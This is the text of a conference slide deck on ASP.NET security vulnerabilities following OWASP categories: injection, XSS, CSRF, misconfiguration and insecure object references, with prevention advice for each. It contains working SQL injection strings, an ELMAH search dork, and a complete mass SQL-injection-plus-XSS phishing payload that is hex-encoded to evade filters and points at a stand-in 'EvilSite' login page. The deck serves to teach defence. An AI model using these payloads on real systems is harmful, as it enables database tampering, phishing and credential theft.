ASP.NET security vulnerabilities

Top Web Apps
Security Vulnerabilities
Aleksandar Bozinovski
Technical Lead, Seavus

Agenda
Importance of Web Security
HTTP, Sessions, Cookies
Injection
Cross Site Scripting (XSS)
Cross-Site Request Forgery (CSRF)
Security Misconfiguration
Insecure Direct Object References

Famous Quote
“Every program has at least two purposes: the
one for which it was written, and another for
which it wasn't.”
-Alan J. Perlis
Alan Jay Perlis was an computer scientist known for his
pioneering work in programming languages, and is the first
recipient of the Turing Award.

Bobby Tables

string query="INSERT INTO Students VALUES ('"+txtName.Text+"','"+txtSSN.Text+"')";
//Attack: Robert’); DROP TABLE Students;-INSERT INTO Students VALUES ('Robert'); DROP TABLE Students;-Students;--','12345')
Robert');

HTTP
Hypertext Transport Protocol
– Language of the Web. Protocol used for
communication between web browsers and web
servers
– Standard RFC 1945, 1996

URL
– Uniform Resource Identifier

Methods
– GET, POST, PUT, HEAD, OPTIONS

Statelessness, Cookies
 In its nature HTTP it is said to be a stateless protocol.
– i.e. from one web page to the next there is nothing in the
protocol that allows a web program to maintain program “state”
(like a desktop program).
– “state” can be maintained by “witchery” or “trickery” if it is
needed.

 Cookie – piece of data sent from a website and stored in a
user's web browser while a user is browsing a website.
– The Server sets the cookie in a response.
– The client includes the cookies in the Http header for
subsequent requests to the server.
– Example Cookie:
ASP.NET_SessionId=haay355s5g0vm5zotvlncqpr

Injection
OWASP Definition
– Injection flaws, such as SQL, OS, and LDAP
injection, occur when untrusted data is sent to an
interpreter as part of a command or query. The
attacker’s hostile data can trick the interpreter
into executing unintended commands or accessing
unauthorized data.

SQL Injection
Happens when we create query but we fail to
validate and sanitize untrusted input data.

SQL Queries
Queries constructed with concatenating
strings are vulnerable to SQL Injection.
var categoryId = Request.QueryString["CategoryId"];
var sql =
"SELECT * FROM Products WHERE CategoryID=" + categoryId;
// If we enter "7 OR 1=1" in query string we end up with:
SELECT * FROM Products WHERE CategoryID=7 OR 1=1
// Attacker can use ; to terminate current command and run its
own commands.
SELECT * FROM Products WHERE CategoryID=7; DROP TABLE Products

Prevent SQL Injection
 Validate untrusted data. If input data is supposed
to be number, convert it to number or check it
with regex.
 Use parameterized SQL queries instead of strings
soup.
– Using stored procedures is also a good idea but keep
in mind that stored procedures are vulnerable if they
concatenate strings on their own.

 Use ORMs (like Entity Framework) that are
inherently resistant to SQL Injection.

Other Injection Attacks
LDAP Injection
– string ldapSearch = "(cn=" + txtSearchTerm.Text + ")";

Dynamic LINQ Injection
– string where = “Table.Contains("" + search + "")";

XPATH Injection
– string loginExpression =
"/employees/employee[loginID/text()='" + username + "' and
passwd/text()='" + password + "']";

Cross-Site Scripting (XSS)
OWASP Definition
– XSS flaws occur whenever an application takes
untrusted data and sends it to a web browser
without proper validation and escaping. XSS
allows attackers to execute scripts in the victim’s
browser which can hijack user sessions, deface
web sites, or redirect the user to malicious sites.

Types of XSS Attacks
 Stored XSS
• Stored attacks are those where the injected code is
permanently stored on the target servers.
• Users should not be able to create message content that
could cause another user to load an undesirable page or
undesirable content when the user's message is retrieved.

 Reflected XSS
• Reflected attacks are those where the injected code is
reflected off the web server, such as in an error
message, search result.
• Reflected attacks are delivered to victims via another
route, such as in an e-mail message, or on some other web
server.

Built-in protection
Modern browsers and servers employ many
first line defenses against XSS by default:
– ASP.NET Request Validation, present since version
2.0. In ASP.NET 4.0 it is enabled for all types of
requests not just pages. To be turned off we must
revert to the older mode
requestValidationMode="2.0“
– Output encoding. MVC Razor view engine encodes
everything by default. XSS is possible only if we
use @Html.Raw()

Built-in protection
– AntiXSS library is by default included in ASP.NET
Web Forms 4.5. Can be retrofitted on older web
apps.

– Google Chrome has built-in anti XSS protection

Cross-Site Request Forgery
OWASP Definition
– A CSRF attack forces a logged-on victim’s browser
to send a forged HTTP request, including the
victim’s session cookie and any other
automatically included authentication
information, to a vulnerable web application. This
allows the attacker to force the victim’s browser to
generate requests the vulnerable application
thinks are legitimate requests from the victim.

How CSRF works
 Authenticated sessions are persisted via cookies The
cookie is sent with every request to the domain
 The attacking site recreates a legitimately formed request
to the target site Although the request has a malicious
payload (query string parameters or post data)
 The victim’s browser is tricked into issuing the request
For all intents and purposes, the target website views it
as a legitimate request

CSRF Tokens
 To mitigate this risk, we can add randomness via a CSRF
token
 A token is a random string known to both the legitimate
page where the form is and to the browser via a cookie

Security Misconfiguration
OWASP Definition
– Good security requires having a secure
configuration defined and deployed for the
application, frameworks, application server, web
server, database server, and platform. All these
settings should be defined, implemented, and
maintained as many are not shipped with secure
defaults. This includes keeping all software up to
date, including all code libraries used by the
application.

Keep up to date
Your servers
– Windows Server 2012 is arguably more secure
than Windows Server 2003

Client browsers (if applicable)
– Modern browsers include built-in defenses against
most prevalent attacks

Keep your frameworks up to date

Also don’t forget to turn off
ELMAH
– Cases with unprotected ELMAH handlers are
notorious.
– Googledork: inurl:”elmah.axd”

DEBUG
– Performance penalties
– Although not related with direct security risks on
its own beware of #if DEBUG statements that
can disclose information

Also don’t forget to turn off
Script execution on folders where not needed
– Usually folders where various documents or
uploaded files are kept, unless you use App_Data
folder.

HTTP Access to Logs
– Log files can disclose many sensitive details about
your web app. It’s best to keep them outside of
the web app root. If not possible at least keep
them in App_Data.

Insecure Direct Object References
OWASP Definition
– A direct object reference occurs when a developer
exposes a reference to an internal implementation
object, such as a file, directory, or database key.
Without an access control check or other
protection, attackers can manipulate these
references to access unauthorized data.

Direct Object References
– A direct object reference is an observable key
used to identify an individual record in database
• http://northwind.com/Products?catId=1

Direct Object References
– Another example
• http://webapp.com/Download?f=DSC01031.JPG

Prevention
 Implementing proper access control
– Validate user data
– Implement security checks before using object
reference

 Access via undiscoverable surrogate keys
– Integer and natural string types are vulnerable to
enumeration
– A surrogate key that is not pattern-based can add
further obfuscation
• A GUID is a good example

– However, it is security through obscurity

Real example: phishing with
obfuscated SQL injection and XSS
--1. The malicious query appends script to all text values in all tables in the database
DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or
b.xtype=167) and b.name not like '%username%' and b.name not like '%password%'
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
EXEC('update ['+@T+'] set ['+@C+']=['+@C+'] + ''
<script>if(!this.pwnd){this.pwnd=true;$(''''<div style="position:absolute;top:0;left:0;zindex:1000;width:100%;height:100%;"><iframe width="100%" height="100%"
src="http://codecamp.local/EvilSite/Login.aspx" seamless="true"
/></div>'''').appendTo(''''body'''');}</script>'' where ['+@C+'] not like
''%http://codecamp.local/EvilSite/Login.aspx%''');
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

Real example : phishing with
obfuscated SQL injection and XSS
--2. The query is wrtten as one line string
'DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=''u'' and (b.xtype=99 or
b.xtype=35 or b.xtype=231 or b.xtype=167) and b.name not like ''%username%'' and b.name not like ''%password%'' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC(''update [''+@T+''] set [''+@C+'']=[''+@C+''] + '''' <script>if(!this.pwnd){this.pwnd=true;$(''''''''<div style="position:absolute;top:0;left:0;zindex:1000;width:100%;height:100%;"><iframe width="100%" height="100%" src="http://codecamp.local/EvilSite/Login.aspx" seamless="true"
/></div>'''''''').appendTo(''''''''body'''''''');}</script>'''' where [''+@C+''] not like ''''%http://codecamp.local/EvilSite/Login.aspx%''''''); FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE
Table_Cursor DEALLOCATE Table_Cursor'
--3. We cast the query string as varbinary to obfuscate the XSS attack and to bypass XSS filters.
SELECT CAST('DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=''u'' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) and b.name not like ''%username%'' and b.name not like ''%password%'' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO
@T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC(''update [''+@T+''] set [''+@C+'']=[''+@C+''] + '''' <script>if(!this.pwnd){this.pwnd=true;$(''''''''<div style="position:absolute;top:0;left:0;zindex:1000;width:100%;height:100%;"><iframe width="100%" height="100%" src="http://codecamp.local/EvilSite/Login.aspx" seamless="true"
/></div>'''''''').appendTo(''''''''body'''''''');}</script>'''' where [''+@C+''] not like ''''%http://codecamp.local/EvilSite/Login.aspx%''''''); FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE
Table_Cursor DEALLOCATE Table_Cursor' AS VARBINARY(MAX))
-- result:
0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C6563
7420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622020776865726520612E69643D622E696420616E6420612E78747970653D27752
720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136372920616E6420622E6E616D65206E6F74206C
696B65202725757365726E616D65252720616E6420622E6E616D65206E6F74206C696B6520272570617373776F72642527204F50454E205461626C655F437572736F72204645544348204E45585420
46524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827757064617465205B272B40542B27
5D20736574205B272B40432B275D3D5B272B40432B275D202B202727203C7363726970743E69662821746869732E70776E64297B746869732E70776E643D747275653B2428272727273C64697620
7374796C653D22706F736974696F6E3A6162736F6C7574653B746F703A303B6C6566743A303B7A2D696E6465783A313030303B77696474683A313030253B6865696768743A313030253B223E3C69
6672616D652077696474683D223130302522206865696768743D223130302522207372633D22687474703A2F2F636F646563616D702E6C6F63616C2F4576696C536974652F4C6F67696E2E6173707
822207365616D6C6573733D227472756522202F3E3C2F6469763E27272727292E617070656E64546F2827272727626F647927272727293B7D3C2F7363726970743E2727207768657265205B272B40
432B275D206E6F74206C696B6520272725687474703A2F2F636F646563616D702E6C6F63616C2F4576696C536974652F4C6F67696E2E6173707825272727293B204645544348204E4558542046524F
4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72
--4. Final attack is:
a' OR 1=1; DECLARE @S CHAR(4000);SET @S =
CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656
C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622020776865726520612E69643D622E696420616E6420612E78747970653D
27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136372920616E6420622E6E616D65206E6F7
4206C696B65202725757365726E616D65252720616E6420622E6E616D65206E6F74206C696B6520272570617373776F72642527204F50454E205461626C655F437572736F72204645544348204E455
8542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827757064617465205B272B405
42B275D20736574205B272B40432B275D3D5B272B40432B275D202B202727203C7363726970743E69662821746869732E70776E64297B746869732E70776E643D747275653B2428272727273C646
976207374796C653D22706F736974696F6E3A6162736F6C7574653B746F703A303B6C6566743A303B7A2D696E6465783A313030303B77696474683A313030253B6865696768743A313030253B223
E3C696672616D652077696474683D223130302522206865696768743D223130302522207372633D22687474703A2F2F636F646563616D702E6C6F63616C2F4576696C536974652F4C6F67696E2E61
73707822207365616D6C6573733D227472756522202F3E3C2F6469763E27272727292E617070656E64546F2827272727626F647927272727293B7D3C2F7363726970743E2727207768657265205B2
72B40432B275D206E6F74206C696B6520272725687474703A2F2F636F646563616D702E6C6F63616C2F4576696C536974652F4C6F67696E2E6173707825272727293B204645544348204E455854204
6524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 as
CHAR(4000));EXEC(@S)--

• Complete electronic evaluation forms on the
computers in the hall and enter to win!
– Infragistics Ultimate
– Telerik DevCraft
– JetBrains .NET tools
– Semos training vouchers
– Pluralsight subscriptions
– and many more…

ASP.NET security vulnerabilities

More Related Content

What's hot (19)

Similar to ASP.NET security vulnerabilities (20)

Recently uploaded (20)

ASP.NET security vulnerabilities

Editor's Notes